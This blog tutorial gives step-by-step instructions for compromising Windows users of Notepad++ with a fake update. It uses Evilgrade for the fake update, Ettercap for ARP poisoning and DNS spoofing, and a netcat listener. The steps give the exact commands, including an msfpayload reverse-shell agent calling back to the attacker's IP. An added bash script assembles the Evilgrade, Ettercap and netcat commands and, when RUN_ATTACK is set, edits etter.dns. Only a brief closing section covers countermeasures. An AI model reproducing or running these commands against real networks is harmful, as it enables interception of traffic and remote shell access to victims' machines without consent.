15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

Type : Tutorial

Level : Medium, Advanced

What is Evilgrade?

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has its own WebServer and DNSServer modules. It is easy to set up new settings, and it has an autoconfiguration when new binary agents are set.

From : http://www.infobytesec.com

Requirement :

1. Evilgrade

2. Backtrack 5

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5 :

1. Extract Evilgrade, then run it with the commands below (the archive unpacks into a directory named after the tarball, without the .tar.gz suffix):

tar xvfz isr-evilgrade-2.0.0.tar.gz

cd isr-evilgrade-2.0.0/

./evilgrade

If you get an error when running the application, see my post on how to solve Evilgrade errors on Backtrack 5. The picture below shows a successful start:

[Screenshot: Evilgrade started successfully, showing the evilgrade> prompt]

2. Next you need to decide which application to target, because Evilgrade serves that application a fake update carrying our payload. To list all supported applications, use

evilgrade>show modules
List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.

In this tutorial we target users of Notepad++ (the notepadplus module), so that when their application checks for an update automatically it walks into our trap. To select a module, run

evilgrade>configure notepadplus

3. To view the options you can set for the module, use the command show options.

[Screenshot: show options output for the notepadplus module, including the VirtualHost option]

In the image above there is a VirtualHost option set to notepad-plus.sourceforge.net: that is the host the victim's Notepad++ contacts when it checks for an update. We will use this hostname later, when configuring DNS spoofing.

4. The next step is to set the agent, i.e. the fake update that Evilgrade will serve. I configure the agent to build a shell_reverse_tcp payload with msfpayload:

evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

Explanation:

/pentest/exploits/framework3/msfpayload –> the path to msfpayload in the Metasploit install on Backtrack 5; Evilgrade runs this command to build the agent.

windows/shell_reverse_tcp –> the payload: when it runs on the target it connects back to us and gives us a command shell.

LHOST –> the attacker's IP address, i.e. the address of the Backtrack 5 machine the shell connects back to (not localhost).

LPORT –> the port the shell connects back to; we will listen on it in step 13.

X –> tells msfpayload to write a Windows executable to the path between the <%OUT%> markers, which Evilgrade substitutes for the file it serves as the update. See the README file for more on agent configuration.

5. Next we need to start the Evilgrade server. Make sure nothing else is listening on TCP port 80, since Evilgrade's web server binds to it.

[Screenshot: starting the Evilgrade server from the evilgrade(notepadplus)> prompt]

6. With Evilgrade set up, we also need to configure the man-in-the-middle attack with Ettercap, so that when someone's Notepad++ checks for an update the request is redirected to the Evilgrade server. The first step is to edit etter.dns:

pico /usr/share/ettercap/etter.dns

[Screenshot: etter.dns with a record for notepad-plus.sourceforge.net pointing at the attacker's IP]

notepad-plus.sourceforge.net –> the hostname we got from step 3. Add an A record that resolves it to the attacker's IP address (the LHOST from step 4), so that the victim's update request lands on the Evilgrade server.

7. Next we use Ettercap.

"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis."
From : http://ettercap.sourceforge.net/

To run Ettercap, open a new terminal (Ctrl+Alt+T) and run this command:

ettercap -G

Click Sniff –> Unified sniffing –> choose your network interface; in this case I use eth0.

[Screenshot: Ettercap unified sniffing on eth0]

8. Next, enable the dns_spoof plugin. It answers the victim's DNS queries for the hostnames in etter.dns with the addresses we put there, redirecting the update request to the Evilgrade server. Click Plugins –> Manage the plugins –> double-click dns_spoof.

[Screenshot: dns_spoof plugin enabled in the Ettercap plugin list]

9. Next, scan for hosts on the network to find the target. Click Hosts –> Scan for hosts.

[Screenshot: Ettercap host scan results]

10. From the host list, set up the targets: add the victim as Target 1 and the gateway as Target 2, so that traffic in both directions between them passes through us.

[Screenshot: victim and gateway added as Ettercap targets]

11. We also need to perform the man-in-the-middle attack itself, so that the traffic between the targets is intercepted. Click Mitm –> Arp poisoning –> check "Sniff remote connections".

[Screenshot: ARP poisoning dialog with "Sniff remote connections" checked]

12. After everything is set up correctly, click Start –> Start sniffing.

[Screenshot: Ettercap sniffing started]

13. Next we use netcat to listen on port 1234, the LPORT we set in the Evilgrade agent in step 4.

"Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities."

From : http://netcat.sourceforge.net/

Open new terminal(Ctrl+Alt+T) and run this command

nc -l -v -p 1234

Explanation :

-l : listen for an incoming connection instead of connecting out

-v : verbose, so the incoming connection is reported

-p : the local port to listen on (this -l -v -p form is for the traditional netcat shipped with Backtrack 5; the OpenBSD netcat found on newer distributions takes nc -lv 1234)
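The thirteen steps above only work if a handful of values agree with each other: the LHOST and LPORT in the agent command, the VirtualHost written into etter.dns, the interface Ettercap sniffs, and the port netcat listens on. The script below is an added example, not part of the original tutorial and not Evilgrade's or Ettercap's own code: it keeps those values in one place and produces the non-GUI form of each step (the lines to paste at the evilgrade> prompt, the etter.dns record, the text-mode Ettercap command equivalent to the clicks in steps 7-12, and the netcat listener). It assumes the tutorial's own values (attacker 192.168.8.91, port 1234, eth0, the Backtrack 5 msfpayload path) and the Ettercap 0.7.x target syntax `/IP/`; the victim and gateway addresses are arguments, and nothing is written or executed unless RUN_ATTACK=1 is set.

```bash
#!/bin/bash
# Added example (not from the tutorial or Evilgrade): one place for the values
# that steps 1-13 must agree on, plus the non-GUI form of each step's command.
# Defaults are the tutorial's own values; all can be overridden from the env.
set -u

ATTACKER_IP="${ATTACKER_IP:-192.168.8.91}"                # LHOST, step 4
LPORT="${LPORT:-1234}"                                    # LPORT, steps 4 and 13
VHOST="${VHOST:-notepad-plus.sourceforge.net}"            # VirtualHost, step 3
IFACE="${IFACE:-eth0}"                                    # step 7
ETTER_DNS="${ETTER_DNS:-/usr/share/ettercap/etter.dns}"   # step 6
MSFPAYLOAD="${MSFPAYLOAD:-/pentest/exploits/framework3/msfpayload}"

# Value for Evilgrade's "set agent" (step 4): a one-element array holding the
# shell command that builds the fake update. Evilgrade substitutes the path
# between the <%OUT%> markers for the file it will serve to the victim.
agent_spec() {
    printf '%s' "[\"$MSFPAYLOAD windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT X > <%OUT%>/tmp/notepadplus.exe<%OUT%>\"]"
}

# The lines to type at the evilgrade> prompt (steps 2, 4 and 5).
evilgrade_commands() {
    printf 'configure notepadplus\n'
    printf "set agent '%s'\n" "$(agent_spec)"
    printf 'start\n'
}

# One etter.dns record (step 6): "<host> A <ip>" makes the dns_spoof plugin
# answer A queries for <host> with <ip>.
etter_dns_entry() {
    printf '%s A %s\n' "$1" "$2"
}

# Add the record to an etter.dns file idempotently: existing records for the
# same host are dropped first, so re-running never leaves two answers.
add_etter_dns_entry() {
    host=$1; ip=$2; file=$3
    tmp=$(mktemp) || return 1
    if [ -f "$file" ]; then
        awk -v h="$host" '$1 != h' "$file" > "$tmp"
    fi
    etter_dns_entry "$host" "$ip" >> "$tmp"
    mv "$tmp" "$file"
}

# Text-mode Ettercap equivalent of the GUI clicks in steps 7-12 (0.7.x target
# syntax /IP/ as on Backtrack 5): -T text interface, -q quiet, -i interface,
# -M arp:remote = ARP poisoning with "Sniff remote connections", -P dns_spoof.
# Target 1 is the victim, target 2 the gateway, so both directions pass us.
ettercap_cmd() {
    printf 'ettercap -T -q -i %s -M arp:remote -P dns_spoof /%s/ /%s/\n' \
        "$IFACE" "$1" "$2"
}

# Listener for the reverse shell (step 13); traditional netcat syntax.
listener_cmd() {
    printf 'nc -l -v -p %s\n' "$LPORT"
}

# Only touches the system when explicitly asked: needs root and a live LAN.
if [ "${RUN_ATTACK:-0}" = 1 ]; then
    if [ $# -ne 2 ]; then
        echo "usage: RUN_ATTACK=1 $0 <victim-ip> <gateway-ip>" >&2
        exit 2
    fi
    add_etter_dns_entry "$VHOST" "$ATTACKER_IP" "$ETTER_DNS"
    echo "# paste at the evilgrade> prompt:"; evilgrade_commands
    echo "# then, in two more terminals:"; ettercap_cmd "$1" "$2"; listener_cmd
fi
```

Run it as `RUN_ATTACK=1 ./evilgrade-mitm.sh 192.168.8.5 192.168.8.1` (victim, then gateway) from a root shell; it updates etter.dns and prints the Evilgrade, Ettercap and netcat commands to start in separate terminals, in that order, before the victim's Notepad++ checks for an update.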

14. When the user opens Notepad++ and it asks whether to update, as in the picture below, the user answers YES. The updater then resolves notepad-plus.sourceforge.net, gets our address from dns_spoof, and downloads the agent from the Evilgrade server instead of the real update.

[Screenshot: Notepad++ update prompt on the victim's machine]

15. Our netcat terminal now has something interesting: the payload has connected back and we are on the victim's shell.

[Screenshot: netcat terminal with the reverse shell from the victim]

Countermeasure :

1. Do not trust an updater that fetches its update over plain HTTP and runs whatever comes back. Prefer applications that fetch updates over HTTPS with certificate validation and verify a signature (or at least a hash published out of band) on the download before executing it, or download the installer yourself from the vendor's site and check it the same way.

2. Keep your antivirus up to date. It may catch a stock msfpayload executable, but a repacked or custom agent can slip past it, so do not rely on this alone.

3. The attack also depends on ARP poisoning and DNS spoofing on the local network. Static ARP entries for the gateway, dynamic ARP inspection and DHCP snooping on managed switches, and a tool that alerts when a known IP changes MAC address all make the man-in-the-middle step visible or impossible.

Hope it helps 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com